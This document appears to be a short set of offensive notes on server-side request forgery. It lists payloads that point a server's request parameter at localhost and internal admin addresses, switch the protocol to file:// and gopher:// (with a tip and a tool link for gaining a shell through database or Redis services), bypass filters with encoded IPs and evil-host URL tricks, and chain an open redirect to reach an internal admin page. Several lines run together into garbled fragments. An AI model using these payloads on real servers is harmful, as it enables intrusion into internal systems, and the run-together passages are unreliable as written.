SSRF attacks against the server itself
api=http://localhost/admin
SSRF attacks against other back-end systems
api=http://192.168.0.68/admin
If you can control the protocol you can change it.
file://, sftp://,
gopher://, etc.
Tip: With gopher in some case it is possible to get a shell. E.g. interacting with mysql, redis PostgreSQL, etc. https://github.com/tarunkant/Gopherus.
Difficult to exploit because you will be able to exploit only well-known vulnerabilities.
Detection: Out-of-band techniques
127.0.0.1, such as
2130706433, 017700000001, or
127.1admin -> aDmIn127.0.0.1. You can use
spoofed.burpcollaborator.net for this purposehttp to httpshttps://expected-host:fakepassword@evil-hosthttps://expected-host.evil-hostIdentify endpoint with open redirect
https://website.com/login?redirect=/my-accountHave the server execute a request that performs a redirect
# Original
api=http://website.com/product?productId=6
# Exploit
api=http://website.com/login?redirect=http://192.168.0.68/admin